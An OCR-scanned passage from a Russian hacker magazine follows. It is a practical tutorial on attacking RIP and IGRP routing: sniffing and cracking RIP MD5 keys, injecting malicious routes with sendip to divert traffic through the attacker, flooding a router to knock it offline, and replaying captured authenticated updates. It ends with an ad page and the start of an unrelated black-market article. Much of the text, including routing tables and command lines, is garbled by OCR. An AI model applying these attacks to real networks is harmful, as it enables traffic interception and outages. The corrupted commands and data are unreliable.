проигрываем НР-пакет на локальной машине, 
чтобы его поймал С&А 


Чтобы С&А работал правильно, интерфейс дол- 
жен находиться в режиме прослушивания. После 
нахождения НР-пакета он переносится в окно 
взлома и начинается атака путем перебора или по 
словарю. Правила стандартного перебора работа- 
ют, но действительно длинные и сложные пароли 
ты не раскусишь, если только не будешь иметь де- 
ло с подконтрольным суперкомпьютером или 
сетью для распределенных вычислений. 


подготовка | 
экспериментальной 
установки 


> — энумерация НР. Не забудь добавить опцию 
«-\» для детального отображения содержимого 
пакета и опцию «-$ 0» — для интерпретации имен- 
но всех данных, содержащихся в пакете, а не толь- 
ко в первых 68-ми байтах (листинг 1). 

Как показал листинг, на атакуемой сети ак- 
тивно вещают два маршрутизатора: 192.168.69.100 
и 192.168.69.36. Притом хост 192.168.69.36 уведом- 
ляет, что он может передавать пакеты в две подсе- 
ти класса С (192.168.30.0/24 и 192.168.7.0/24). Хост 
192.168.69.100 сказал, что: 1) через него проходит 
стандартный маршрут 0.0.0.0/0; 2) он может переда- 
вать пакеты в некоторые сети (192.168.0.1/32, 192.168. 
1.0/24, 192.168.10.0/24 и 192.168.11.0/24); 3) пакеты, 
адресованные в сеть 192.168.15.0/24, должны ад- 
ресоваться через маршрутизатор 192.168.69.110. 
Маршрут в сеть 192.168.15.0/24 идет через другой 
хост, это означает одно из двух: 1) маршрут прописан 
статически; 2) маршрутизатор 192.168.69.110 вруч- 
ную настроен на оповещение только одного соседа. 

Стандартное оповещение соседей происходит 
каждые 30 секунд, хотя временной интервал опове- 
щения может зависеть от установок каждого индиви- 
дуального маршрутизатора. Некоторые маршрутиза- 
торы могут находиться в так называемом «пассивном 
режиме» (устанавливается командой «passive-inter- 
face <имя интерфейса>» на определенный интер- 
фейс). В таком случае маршрутизатор на данном 
интерфейсе будет принимать оповещения от соседей 
и менять свою таблицу маршрутизации, но не будет 
оповещать о своих или о выученных маршрутах. 


ЛИСТИНГИ 


Листинг 1 


Листинг 2 


Для энумерации сети, особенно если в ней при- 
сутствует множество активных маршрутизаторов, 
удобнее использовать программу ass из раз — 
сборника утилит, разработанных ЕХ из команды 
Phenoelit. После запуска утилита переходит в пассив- 
ный режим сканирования, так что, когда истечет за- 
данное (атакующим) время, он прервет программу 
командой <Ctrl>+<C> и проанализирует результат 
(листинг 1). 

Как продемонстрировал листинг 2, aSS выдает 
те же результаты, что и tcpdump. Единственное отли- 
чие — это визуальное отображение информации и 
то, что ASS дополнительно определил, что использу- 
ется НР второй версии без аутентификации. Впро- 
чем, возможности утилиты гораздо шире: поддержи- 
вается анализ и других протоколов маршрутизации, 
таких как IRDP, IGRP и EIGRP. Когда время оповеще- 
ния изменено вручную до какого-то очень специфич- 
ного и большого значения или когда не хочется 


ждать стандартного пакета оповещения, можно пос- 
лать специально сконструированный запрос на адрес 
многовещательной рассылки (224.0.0.9). Маршрути- 
заторы в ответ отошлют свою таблицу маршрутов. 


Ответ маршрутизатора 


Часто оповещения от маршрутизаторов не доходят 
до простых пользователей, особенно если грамот- 
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Cain&Abel 


че ыыы ног Ot E 
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Cain&Abel 


ный системный администратор установил фильтра- 
цию рассылки многоадресных адресов на портах 
коммутатора. После посылки запроса ответ с табли- 
цей маршрутизации приходит на адрес посылающе- 
го. Благодаря НР-запросам ты обходишь это ограни- 
чение и получаешь информацию, содержащуюся в 
обновлениях. Сначала придется работать вслепую, 
но на то, чтобы послать запрос на конкретный адрес 
каждой машины в ЛВС, не требуется много времени. 
> аутентификация RIP. Когда вышла вторая 
версия протокола НР, жизнь системных админи- 
страторов облегчилась ее новой дополнительной 


возможностью — функцией аутентификации марш- 
рутизатора, посылающего обновления. Вернее, даже 
не самого маршрутизатора, а пакета обновления. На 
данный момент существует два воплощения аутенти- 
фикации: «незашифрованный текст» и «МО5». В слу- 


ваченный пакет программой tcpdump или tethereal. 


ложное представление о защищенности системы 
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ные пакета, составленные при помощи МО5-алго- 
ритма (подробнее в ВЕС-1321 и ВЕС-2082). 
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опции sendip, относящиеся к генерации Н!Р-пакетов 
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пы 


Несмотря на присутствие аутентификации, атакую- 
щий может получить данные о состоянии маршру- 
тов, проанализировав перехваченные данные. Но 
он никак не сможет посылать специальные запросы, 
чтобы получить таблицы маршрутизации, так как 
маршрутизатор просто проигнорирует неправильно 


специальные НР-пакеты, несущие аутентифика- 
цию, умеет только одна утилита — sendip. Правда, 
она работает криво и коверкает содержимое. 

Есть вариант посылать такие пакеты уста- 
новкой пакета маршрутизации Quagga, используя 
программу модификации пакетов в рсар-формате 
NetDude или hexeditor. Независимо от Toro, какой 
утилитой ты будешь пользоваться для создания 
произвольных пакетов, нужно получить значение 
ключа, чтобы пакет был принят маршрутизатором. 
установка маршрутизатора Ha Linux. Прежде 
чем перейти к практической части, посмотрим при- 
мер установки и конфигурации пакета маршрути- 
зации с открытым кодом Quagga (www.quagga-net), 


+ 


] 


генерация пакета запроса и перехват ответа (оба маршрутизатора переслали свою таблицу маршрутизации) 
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Практически любой современный дистрибутив 
Linux поддерживает Quagga, проще всего устано- 
вить ее из системы управления пакетами дистри- 
бутива, но можешь собрать и вручную — Quagga 
(судя по моему опыту) собирается из исходников 
без особых проблем на различных системах, в том 
числе Ha Solaris и BSD. 


для сборки пакета используй стандартную практику 


После установки необходимые начальные файлы 
конфигурации обычно находятся в /etc/quagga/. 
Если понадобится, создай новые или измени кон- 
фигурационные файлы примеров и запускай необ- 
ходимые демоны. После запуска telnet позволит 
зайти на интерфейс управления демоном маршру- 
тизации (РР-демон слушает на порту 2602), кото- 


теория 


рый практически точно повторит интерфейс кон- 
фигурации Cisco IOS. 


пример конфигурации демона RIP 


АДМИНИСТРАТИВНАЯ ДИСТАНЦИЯ. ПРАКТИЧЕСКИ В ЛЮБЫХ IP-CETAX ТЫ ВСТРЕТИШЬ КАК 
МИНИМУМ ДВА ТИПА МАРШРУТОВ: ПОДСОЕДИНЕННЫЕ И СТАТИЧЕСКИЕ. В БОЛЕЕ КРУПНЫХ 
СЕТЯХ, ГДЕ ИСПОЛЬЗУЮТСЯ ПРОТОКОЛЫ МАРШРУТИЗАЦИИ, ПОЯВЛЯЮТСЯ ДИНАМИЧЕС- 
КИЕ МАРШРУТЫ, ПРИЧЕМ ИЗ РАЗНЫХ ПРОТОКОЛОВ МАРШРУТИЗАЦИИ. КАКОЙ МАРШРУТ 
ЯВЛЯЕТСЯ БОЛЕЕ ДОВЕРИТЕЛЬНЫМ, А СООТВЕТСТВЕННО, ПРЕДПОЧТИТЕЛЬНЫМ ПРИ ПРИ- 
НЯТИИ РЕШЕНИЯ О МАРШРУТИЗАЦИИ? ЗДЕСЬ И ПОНАДОБИТСЯ ЗНАЧЕНИЕ АДМИНИСТРА- 
ТИВНОЙ ДИСТАНЦИИ, ЗАВИСЯЩЕЕ ОТ ТОГО, КАК МАРШРУТИЗАТОР ВЫУЧИЛ МАРШРУТ. 


Основные сведения о стандартных значениях административной дистанции 


источник информации о маршруте 


административная дистанция 


подсоединенный 0 
статичный i 
внешний BGP 20 
внутренний EIGRP 90 
IGRP 100 
OSPF 110 
IS-IS lls 
RIP 120 
внешний EIGRP 170 
внутренний ВСР 200 
неизвестный 255 


АДМИНИСТРАТИВНАЯ ДИСТАНЦИЯ НЕ МОЖЕТ БЫТЬ ИЗМЕНЕНА С УДАЛЕННОЙ МАШИНЫ 

И УСТАНАВЛИВАЕТСЯ НА САМОМ МАРШРУТИЗАТОРЕ. ТАК ЧТО ЕДИНСТВЕННЫЙ СПОСОБ 
ПОПЫТАТЬСЯ ИЗМЕНИТЬ ТАБЛИЦУ МАРШРУТИЗАЦИИ — ПОМЕНЯТЬ ЕЕ ТАКИМ ОБРАЗОМ, 
ЧТОБЫ МАРШРУТ ИМЕЛ МЕНЬШУЮ МЕТРИКУ. ПО УМОЛЧАНИЮ ВСЕ ПУТИ, ВЫУЧЕННЫЕ ЧЕ- 
РЕЗ НР, ИМЕЮТ МЕТРИКУ КАК МИНИМУМ 1, ЧТО, В ПРИНЦИПЕ, ЛОГИЧНО. ДАЖЕ ЕСЛИ МЫ 
ПРОПИШЕМ В СВОЕМ ПАКЕТЕ МЕТРИКУ ПУТИ, РАВНУЮ 0, ПОЛУЧАЕМЫЙ МАРШРУТИЗАТОР 
ИНТЕРПРЕТИРУЕТ ЕЕ КАК 1. В СИТУАЦИИ, КОГДА МЕТРИКА ПУБЛИКУЕМОГО МАРШРУТА 
БОЛЬШЕ, ЧЕМ 1, МЫ С ЛЕГКОСТЬЮ МОЖЕМ ВНЕДРИТЬ СВОЙ МАРШРУТ, МЕТРИКА КОТО- 
РОГО МЕНЬШЕ ИЛИ РАВНЯЕТСЯ 1 И КОТОРЫЙ БУДЕТ ИМЕТЬ БОЛЕЕ ВЫСОКИЙ ПРИОРИ- 
ТЕТ. ЕСЛИ МЕТРИКА ЛЕГИТИМНОГО МАРШРУТА И БЕЗ ТОГО ИМЕЕТ МИНИМАЛЬНОЕ ВОЗ- 
МОЖНОЕ ЗНАЧЕНИЕ, ПРИДЕТСЯ ПОМЕНЯТЬ ЕЕ НА БОЛЕЕ ВЫСОКУЮ И ОПОВЕСТИТЬ 
МАРШРУТИЗАТОР О СВОЕМ БОЛЕЕ ПРЕДПОЧТИТЕЛЬНОМ ПУТИ. 


Одна из команд, которая отсутствует в IOS, но бу- 
дет очень полезна для ввода маршрутов через 
Quagga, — как ни странно, гоше ххх.ххх.ххх.ххх/уу, 
которая позволяет включать его в пакет обновле- 
ния НР не создавая маршрут в Kernel. 

> — введение зловредных маршрутов в НР. Ос- 
новная цель злоумышленника — не просто пере- 
вести трафик в так называемую «черную дыру» и 
прервать сообщение между сетям, а в первую оче- 
редь перевести трафик через свою машину, чтобы 
извлечь «полезную» информацию. Соответствен- 
но, необходима подготовка для беспрепятствен- 
ной маршрутизации через свой хост, для чего 
включается поддержка маршрутизации в Kernel 
(она выполняется через /ргос-интерфейс). 


включение поддержки маршрутизации 


удостоверяемся, что маршрутизация также разре- 
шена в iptables 


Можно разрешить маршрутизацию только с опреде- 
ленной сети и прописать политику по умолчанию на 
DROP, что позволит отбросить весь ненужный тра- 
фик и ограничить загруженность канала. Могут сло- 
житься такие ситуации, когда ты находишься в той же 
подсети, что и легитимный маршрутизатор, через ко- 
торый осуществляется передача трафика. Если пере- 
вести поток данных через пиратский маршрутизатор 
(вводишь зловредный маршрут, чтобы потом пере- 
дать его легитимному маршрутизатору), обратный 
трафик будет отдаваться с легитимного маршрутиза- 
тора согласно его таблице маршрутизации, минуя те- 
бя. Что делать? Один из спасительных вариантов — 
ввести два зловредных маршрута для каждого из ле- 
гитимных маршрутизаторов, где твой хост выступает 
в качестве следующего узла для каждой из подсетей. 
Второй вариант спасения от проблемы — трансляция 
сетевых адресов и подмена адреса оригинатора на 
твой, опять же при помощи команды iptables. 


подмена адреса оригинатора 


Схема сети для МАТ'а таблица маршрутизации хоста М1 

И 192.168.0.1/32 is directly connected, Serial0 

192.168.1.0/24 is directly connected, Serial0 

192.168.10.0/24 is directly connected, Serial0d 
192.168.11.0/24 is directly connected, Serial0 

LOPE LES. SUL 0/24) [1201] wie TOA SNS. 6o.o6, 00:00:01, thermee) 
RO Lo 168. И. ИИ TAO ша 96. 69.95, 90:00:01, ненееыеЕй 
sy М als) аи О svat, ley) ОВ Sh, ЦО] 
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0.0.0.0/0 
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el (ey (ey (eo) 


M1 в Ol CMO (iyo) weir По Totes Chil 
192.168.69.1 
таблица маршрутизации хоста M2 
192.168.10.0/24 0.0.0.0/0 С 192.168.30.0/24 is directly connected, Serial0d 
через 192.168.69.2 через 192.168.69.1 192.168.7.0/24 is directly connected, $ег1а10 


› 192.168.11.0/24 IO vial 192 163.69. 100, 00:00:01, нЕБеваеЕЙ 
› 192.168.15.0/24 [120/71] vera 192.168.69.110, 00:00:01, BEherner) 
192.168.0.0/32 is subnetted, 1 subnets 


С 
Rear oS О ОИ vere oe Nee 69. АО, ОО ОО, нощеешеео 
В 
В 


М2 


о в 192.168.0.1 [120/71] vie 192.1658.69,100, 00:00:01, Ethernet) 


в 192,168. 1.0/4 [1-01 ма 192.158.59.100, 00:00:91, EthernecD 
Ба Фо [АО ве Пьеро О), CORO ROA), inelasregrsic(0) 


192.168.10.0/24 
таблица маршрутов изменилась и теперь включает вставленный маршрут 
arhontus / # sendip -р ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -р rip - 


эксперимент rv 2 -re 2 -ге 2:0:192.168.50.0:255.255.255.0:192.168.69.102:1 192.168.69.36 


Re Loe 158.50. 0/24 112071] уха 192. 168.66. №08, 90:00:06, Hthernet) 
Практическая часть, самая интересная и долгождан- 


ная :). В следующих примерах аутентификация будет чтобы избежать прерывания сообщения, вводим свой маршрут 

выключена, так как основная задача этого приме- arhontus / # sendip -р ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -р rip - 
ра — показать принципы введения зловредных гу 2 ещо 2 one 980199. 108.85 ь. 255.255 а, 959, ЕТ Wen 99-09, Be 
маршрутов и изменения таблицы маршрутизации. 

> — введение произвольного маршрута. При по- измененная таблица маршрутизации на хосте М2 

мощи утилиты Sendip изменим таблицу маршрути- В 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:15, Ethernet0O Гат] 
зации и добавим маршрут, проходящий через наш via 192.168.69.102, 00:00:01, Ethernet0O 

маршрутизатор на сеть 192.168.50.0/24. 

> изменение метрики маршрута Ha меньшее arhontus / # sendip -p ipv4 -is 192.168.69.100 -p udp -us 520 -ud 520 -p rip - 
значение. Теперь изменим один из существующих ley 2 Stee 2 Se) 2:0: 192.158. 10.0: 255.255 255.0: 192. Nessie) AOE UA SIs) Gn ae 
маршрутов, о которых оповещает маршрутизатор В 192.168.10.0/24 [120/1] via 192.168.69.102, 00:00:22, Ethernet0O 


M1. Возьмем для примера 192.168.10.0/24. 
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проверка того, что пакет содержит необходимый маршрут, с использованием tethereal (tcpdump не | инок ia 


192.168.10.0/24 


Административная дистанция маршрута равняется 
120 (значение по умолчанию для протокола НР), ко- 
личество узлов до этой сети равно 1. 

После добавления своего маршрута можно 
удалять мешающий легитимный маршрут, для че- 
го посылается пакет, как будто бы пришедший с 
хоста М1, с более высокой метрикой. Мы поменя- 
ли метрику легитимного маршрута на 2, и маршру- 
тизатор автоматически удалил легитимный марш- 
рут, оставив только введенный. При введении мет- 
рики маршрута, равной 16, он будет автоматичес- 
ки удален, даже если ему нет альтернативы. 

Помни, что по умолчанию оповещения проис- 
ходят с 30-секундным интервалом. И если хочешь, 
чтобы путь постоянно оставался приоритетным, не 
забудь оповещать о жизнедеятельности введенно- 
го маршрута каждые 30 секунд или чаще. 


отсылка оповещения в цикле 


Маршрут, который подвергли удалению, появится 
в таблице после очередного пакета оповещения, 
пришедшего с легитимного маршрутизатора, так 
что можешь включить его удаление в цикл опове- 
щения, если считаешь, что админ часто заходит на 
маршрутизатор и смотрит таблицу маршрутов. 
Маршрут, распределенный между двумя маршру- 
тизаторами, имеет гораздо большие шансы прив- 
лечь его внимание. 
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> = изменение оповещаемой маски маршрута на 
более специфичную. Продолжая изменять тот же 
маршрут, попробуем разделить его на две подсе- 
ти: 192.168.10.0/25 и 192.168.10.128/25. Тем са- 
мым получим приоритет. 

Не пугайся, что в таблице присутствует 

192.168.10.0/24 [120/1] ма 192.168.69.100. Через этот 
хост трафик больше не будет передаваться в подсеть, 
так как наша маска более специфична, она и выбира- 
ется при решении о маршрутизации. Если маска опо- 
вещаемого маршрута равна 255.255.255.255, указать 
более конкретную маску невозможно и придется вы- 
бирать другие пути решения проблемы. 
> DOS маршрутизатора. Последний и самый 
весомый аргумент (самый «грязный») — DOS марш- 
рутизатора, оповещающего о конкретном маршруте. 
Если нельзя воспользоваться двумя предыдущими 
способами изменения таблицы маршрутизации, то 
нужно предотвратить отсылку оповещений от конк- 
ретного маршрутизатора, чтобы остальные маршру- 
тизаторы посчитали маршрут(ы) мертвым(и). Прото- 
кол НР использует четыре вида таймеров: 


1 ОРОАТЕ-ТАЙМЕР, ОТВЕЧАЮЩИЙ ЗА 
ПЕРИОДИЧНОСТЬ ПОСЫЛКИ ОБНОВЛЕ- 
НИЙ. ПО УМОЛЧАНИЮ ОБНОВЛЕНИЯ ОТ- 
СЫЛАЮТСЯ КАЖДЫЕ 30 СЕКУНД. 


2 INVALID-TAMMEP, УКАЗЫВАЮЩИЙ ВРЕ- 
МЯ, ЧЕРЕЗ КОТОРОЕ МАРШРУТ ОБЪЯВ- 
ЛЯЕТСЯ НЕПРИГОДНЫМ К ИСПОЛЬЗО- 
ВАНИЮ, ЕСЛИ В ТЕЧЕНИЕ ЭТОГО ВРЕ- 
МЕНИ НЕ ПРИХОДИЛИ ОБНОВЛЕНИЯ. ПО 
УМОЛЧАНИЮ ЗНАЧЕНИЕ РАВНЯЕТСЯ 
180 СЕКУНДАМ. НЕСМОТРЯ НА ТО, ЧТО 
МАРШРУТ ОБЪЯВЛЯЕТСЯ НЕПРИГОД- 
НЫМ И АФИШИРУЕТСЯ В ЭТОМ СОСТОЯ- 
НИИ, ОН ПРОДОЛЖАЕТ ИСПОЛЬЗОВАТЬ- 
СЯ ДО ПЕРЕХОДА В РЕЖИМ HOLDDOWN. 


3 HOLDDOWN-TAUMEP, ОТВЕЧАЮЩИЙ ЗА 
ВРЕМЯ, В ТЕЧЕНИЕ КОТОРОГО ИНФОР- 
МАЦИЯ ОБ АЛЬТЕРНАТИВНЫХ МАРШРУ- 
ТАХ НЕ ИСПОЛЬЗУЕТСЯ. КОГДА 180 СЕ- 
КУНД ИСТЕКУТ (ЗНАЧЕНИЕ ПО УМОЛЧА- 
НИЮ) И ЕСЛИ ЕСТЬ АЛЬТЕРНАТИВНЫЕ 
ЛУЧШИЕ МАРШРУТЫ, ОНИ ПРИНИМАЮТ- 
СЯ В ТАБЛИЦУ МАРШРУТИЗАЦИИ. 


4 FLUSH — ВРЕМЯ, ЧЕРЕЗ КОТОРОЕ 
МАРШРУТ ОКОНЧАТЕЛЬНО УБИРАЕТСЯ 
ИЗ ТАБЛИЦЫ МАРШРУТИЗАЦИИ. ЗНАЧЕ- 
НИЕ ПО УМОЛЧАНИЮ — 240 СЕКУНД. 


значения по умолчанию можно посмотреть коман- 
дой sh ip protocols 


Как видишь, нужно воспрепятствовать посылке 
обновлений маршрутизатором в течение всего 
трех минут, для чего есть десятки приемов. Но не 
забудем, что мы находимся на одной локалке, а 
процессорная мощность маршрутизатора не рас- 
считана на обработку десятков тысяч пакетов об- 
новлений в минуту. Соответственно, «отключить» 
маршрутизатор на какое-то время проще всего по- 
сылкой бессмысленных пакетов обновлений. 


проще всего ввести в цикл посылку обновления 
утилитой sendip 


«Командой» может быть sendip с необходимыми 
опциями. Впрочем, если «экономишь электричест- 


теория 
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во» и не хочешь лишний раз напрягать централь- 
ный процессор, создавай один пакет, сохраняй его 
и передавай в сеть, используя встроенные воз- 
можности замечательной утилиты tcpreplay. Обра- 
ти внимание на опции -1 (loop) и -R (topspeed). Смо- 
жешь повысить скорости (по сравнению с тем, ес- 
ли бы делал это через sendip). Только будь осто- 
рожней и не урони локалку :). 

3» что делать с аутентификацией. Предполо- 
жим, взломать МО5Б-аутентификацию НР-домена 
не получилось из-за сложности установленного 
ключа. Не стоит отчаиваться! Дело в том, что дата 
аутентификации не учитывает |Р-адрес отправите- 
ля — этим и воспользуемся. Перехватив и записав 
пакет обновления, можно проиграть его снова и 
снова, и он будет принят маршрутизатором. Един- 


IGRP ИСПОЛЬЗУЕТ ТАК НАЗЫВАЕМУЮ СОСТАВНУЮ МЕТРИКУ И ПРИ ЕЕ ВЫЧИСЛЕНИИ 


УЧИТЫВАЕТ НЕСКОЛЬКО ФАКТОРОВ: 


— ЗАДЕРЖКА (DELAY) — ОБЩАЯ ЗАДЕРЖКА ВСЕГО ПУТИ, ИСЧИСЛЯЕМАЯ В 10-МИКРО- 


СЕКУНДНЫХ ЕДИНИЦАХ. 


— ПРОПУСКНАЯ СПОСОБНОСТЬ КАНАЛА (BANDWIDTH) — МОЖЕТ БЫТЬ УСТАНОВЛЕНА 
ДЛЯ КАЖДОГО ОТДЕЛЬНОГО ИНТЕРФЕЙСА. 


~~ НАДЕЖНОСТЬ (RELIABILITY) — ИНДИКАТОР НАДЕЖНОСТИ КАНАЛА ОПРЕДЕЛЯЕТСЯ 
ЗНАЧЕНИЕМ В ИНТЕРВАЛЕ МЕЖДУ 1 И 255, ГДЕ 255 ОПОВЕЩАЕТ О 100% НАДЕЖНОС- 


ТИ КАНАЛА. 


— ЗАГРУЖЕННОСТЬ (LOAD) — ИНДИКАТОР ЗАГРУЖЕННОСТИ КАНАЛА ОПРЕДЕЛЯЕТСЯ 
ЗНАЧЕНИЕМ В ИНТЕРВАЛЕ МЕЖДУ 1 И 255, ГДЕ 1 ОПОВЕЩАЕТ О НУЛЕВОЙ ЗАГРУ- 


ЖЕННОСТИ КАНАЛА. 


IGRP ТАКЖЕ ПЕРЕДАЕТ ИНФОРМАЦИЮ О МАКСИМАЛЬНО ВОЗМОЖНОЙ ЕДИНИЦЕ ПЕРЕ- 
ДАЧИ ДАННЫХ (MTU), ХОТЯ ОНА И НЕ ИСПОЛЬЗУЕТСЯ ДЛЯ ПОДСЧЕТА МЕТРИКИ МАРШ- 
РУТА, НО ПОКАЗЫВАЕТ МАКСИМАЛЬНО ВОЗМОЖНЫЙ РАЗМЕР ПАКЕТА БЕЗ ФРАГМЕНТА- 


ЦИИ ДЛЯ КОНКРЕТНОГО ПУТИ. 


формула подсчета метрики для маршрута 


вторая формула, если константа К5 больше нуля 


КОНСТАНТЫ К1 — К5 ИСПОЛЬЗУЮТСЯ ДЛЯ БОЛЕЕ ДЕТАЛЬНОГО КОНТРОЛЯ НАД ПОЛУ- 
ЧАЕМОЙ МЕТРИКОЙ И АДАПТАЦИИ ПРОТОКОЛА ДЛЯ НУЖД КОНКРЕТНОЙ СЕТИ. ПО 
УМОЛЧАНИЮ КОНСТАНТЫ K1 И КЗ РАВНЫ 1, А КОНСТАНТЫ K2, K4 И K5 — 0. 


упрощенное уравнение 


ОПЫТ ПОКАЗЫВАЕТ, ЧТО ОБЫЧНО СИСТЕМНЫЕ АДМИНИСТРАТОРЫ НЕ ИЗМЕНЯЮТ ЗНА- 
ЧЕНИЯ КОНСТАНТ. ВПРОЧЕМ, ДЕЛАТЬ ЭТО И НЕ РЕКОМЕНДУЕТСЯ, КРОМЕ ТЕХ СЛУЧА- 
ЕВ, КОГДА ТЫ ДОСКОНАЛЬНО ЗНАЕШЬ ОСОБЕННОСТИ РАБОТЫ АЛГОРИТМА ПРОТОКО- 
ЛА МАРШРУТИЗАЦИИ (КАКИМ ОБРАЗОМ ТАКИЕ ИЗМЕНЕНИЯ МОГУТ ПОВЛИЯТЬ НА РА- 
БОТУ МАРШРУТИЗАТОРОВ). КАК И В ОСТАЛЬНЫХ ПРОТОКОЛАХ МАРШРУТИЗАЦИИ ПО 
ВЕКТОРУ РАССТОЯНИЯ, ПРЕДПОЧТЕНИЕ ОТДАЕТСЯ МАРШРУТУ С МЕНЬШЕЙ МЕТРИКОЙ. 
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ственное, что отмечу: нельзя изменять содержи- 
мое НР-заголовка, так что если хочешь проиграть 
какой-то пакет со специфичным маршрутом, запа- 
сись временем и жди подходящего момента в из- 
менении топологии сети. Включив поддержку 
МО5-аутентификации на нашей тестовой сети, 
посмотрим, что можно сделать. 

Теперь пытаемся изменить адрес отправителя 
на свой. Для этого берем программу netdude или со- 
вершаем подмену напрямую в tcpreplay. Любители 
графического интерфейса по достоинству оценят 
первый вариант, но не стоит забывать, что скорее 
всего у нас не будет Х’ов на удаленной машине. Так 
что лучше проводить модификацию в консоли ис- 
пользуя встроенные возможности tcpreplay. Настоя- 
щие асы всегда могут воспользоваться НЕХ-редак- 
тором для модификации пакета напрямую, только 
не забудь поменять проверочную сумму IPV4. 

При помощи опции -е в пакете переписыва- 
ются адреса отправителя и получателя. Если опе- 
рация выполнится, суммы проверки будут измене- 
ны автоматически. Меняем адреса отправителя 
(с 192.168.69.100 на 192.168.69.102) и получателя 
(с 224.0.0.9 на 192.168.69.36). А при помощи опций 
-К и -| изменяем МАС-адреса, взятые из ARP-Ta6- 
лицы, иначе в пакете останется АНР-адрес много- 
адресной рассылки 01:00:5е:00:00:09, соответ- 
ствующий 224.0.0.9. 

Маршрут был принят, но оказался вторич- 
ным, чего и следовало ожидать. Теперь заставим 
молчать маршрутизатор, посылающий легитим- 
ные маршруты, и одновременно будем посылать 
пакеты обновления на атакуемый маршрутизатор. 
Через три минуты наш маршрут получит предпоч- 
тение. Единственный момент, который стоит упо- 
мянуть: в течение этого времени трафик переста- 
нет ходить через легитимный маршрутизатор, ко- 
торый ВОЗ’ится... 

По умолчанию информация о стандартном 
маршруте не включается в обновления НР-пакета. 
Однако в сетях, в которых возможна частая смена 
|Р-адреса стандартного шлюза или если админ по- 
ленился прописать IP-anpec на каждой индивиду- 
альной машине либо он просто считает редистрибу- 
цию такой информации прикольной фишкой, твоя 
задача ограничится получением такого пакета. 
После его проигрывания на адрес многоадресной 


рассылки весь трафик с маршрутизаторов, полага- 
ющихся на получение этой информации из НР-па- 
кетов, будет проходить через нашу машину. Хоро- 
шим правилом поведения/конфигурации все же счи- 
тается установка стандартного шлюза статическим 
образом, а не через default-information originate. 

атаки на IGRP. IGRP не поддерживает аутен- 
тификацию, поэтому единственное, что нужно по- 
лучить, — номер автономной системы. Если нахо- 
дишься на одной сети, то сможешь увидеть эту 
часть информации из перехваченного пакета, а 


$ 


информация из перехваченного пакета. 


вы 


По умолчанию стандартное время посылки опове- 
щений равняется 90 с, и каждое оповещение 
включает информацию о всей таблице маршрути- 
зации. Как видно по перехваченному пакету, ин- 
формация о нескольких дополнительных факто- 
pax, сопутствующая каждому конкретному марш- 
руту, также присутствует. 

> — ввод новых маршрутов в IGRP. Для ввода но- 
вых маршрутов можно воспользоваться утилитой 
igrp из irpas suite — единственным на сегодня дос- 
тупным средством ввода произвольных маршру- 
тов в протокол IGRP. 


ввод новых маршрутов 


= 


ополнительно создадим файл, где описаны 
маршруты, которые будем вводить в автономную 
систему. 

Наш маршрут был принят без особых проб- 
лем. Теперь попытаемся изменить маршрутиза- 
цию существующих маршрутов и перенаправить 
весь трафик через себя. Зная, каким образом 
подсчитывается метрика, укажем самые выиг- 
рышные значения вводимого маршрута, отошлем 
его маршрутизатору и посмотрим, каким образом 
изменилась метрика. 


посыл маршрутизатору и изменение метрики 


Наш маршрут вытеснил предыдущий легитимный 
маршрут, чего мы и хотели. Не забудь посылать 
регулярные пакеты обновлений каждые 90 секунд, 
иначе твой маршрут объявят мертвым и быстро 
исключат из таблицы маршрутизации. 


значения по умолчанию (команда sh ip protocols) 


ВЫВОДЫ 


Мы рассмотрели принципы атак на протоколы 
маршрутизации, работающие по алгоритму марш- 
рутизации по вектору расстояния. Большинство 
описанных в статье атак могут быть предотвраще- 
ны или вовремя замечены, при условии что прото- 
колы маршрутизации настроены правильно и ис- 
пользуются аутентификация и листы контроля 


УЖЕ В ПРОДАЖЕ 


'Мобильные — 
компьютеры 


Тестированые новая: wogerer КП 


208 и смарисюноя 


НЫ Te № WERE # IEW Lae ee 


Shinn: = 


feed тети 


Зееы 623 банных 


ори ©, поното ри. 


110 МОГУТ COBDEMEMARIE ACME HEAT 


травой в массы 


НЕЦЬ 2502 5b ов ыы 


Пелать ес пн Capes He aa ум : 
зем ell nd aye 
PO Dak Oe разиоеа OOQE пов tewewifaa ОМА] 


Hoc КЛ м Интереаеа 


За 2004 год в России зарегистрировано 13 723 
преступления, что на 94% больше, чем в 2003. 
В 2005 году зарегистрировано 14 810 преступле- 
ний, что, тем не менее, на 11,7% больше, чем в 
2004 году. Очевидно замедление темпов роста, 
однако количество преступлений в сфере инфор- 
мационных технологий все-таки продолжает рас- 
ти. Так происходит не только в России, но и во 
всем мире, поэтому можно уверенно говорить о 
продолжении роста преступности и ее дальней- 
шем развитии в ближайшие годы. 


Dr. Klouniz 


НЕЗАВИСИМЫЙ СУДЬЯ 
ВЫПУСКАЮЩИЙ РЕДАКТОР ЖУРНАЛА 
«ХАКЕР СПЕЦ» 


Во-первых, не удивляйся стилю этой статьи :). Действительно, такого жестоко казенного стиля в на- 
шем журнале ты еще не видел и, скорее всего, больше не увидишь. Мы поставили себе именно та- 
кую секретную задачу: сначала автор пишет статью (собственно, он собрал информацию и из офи- 
циальных источников, и от темной стороны), а потом я общаюсь с настоящими или бывшими предс- 
тавителями компьютерного андеграунда и выношу их мнение на твой суд (и не только, обрати вни- 


мание на точку зрения одного хорошего человека из «Лаборатории Касперского» :). Да, я имею в ви- 
ду А. Семенюченко, хотя здесь он только высказывает свое мнение.) Почему так? Потому что едино- 
го мнения нет и не может быть: мы никогда не вычислим точное количество зло-компьютерщиков, не 


залезем им в карман, чтобы подсчитать их заработок, и не выясним среднее количество зомби в 
среднем ботнете. а нам и не надо! Синтезируя информацию из этой статьи с мнениями наших экс- 
пертов, ты сможешь сформировать совершенно определенную и объективную точку зрения. 


тайны 
черного 
рынка IT 


ТЕМНАЯ СТОРОНА ВЫСОКИХ ТЕХНОЛОГИЙ 


СОГЛАСНО СТАТИСТИКЕ ГИЦ МВД РОССИИ ЗА 2005 ГОД, В НАШЕЙ СТРАНЕ ЗАРЕГИСТ- 
РИРОВАНО БОЛЕЕ 14 ТЫСЯЧ ПРЕСТУПЛЕНИЙ В СФЕРЕ ТЕЛЕКОММУНИКАЦИЙ И КОМ- 

ПЬЮТЕРНОЙ ИНФОРМАЦИИ. НАИБОЛЕЕ МНОГОЧИСЛЕННЫ ПРЕСТУПЛЕНИЯ, СВЯЗАН- 

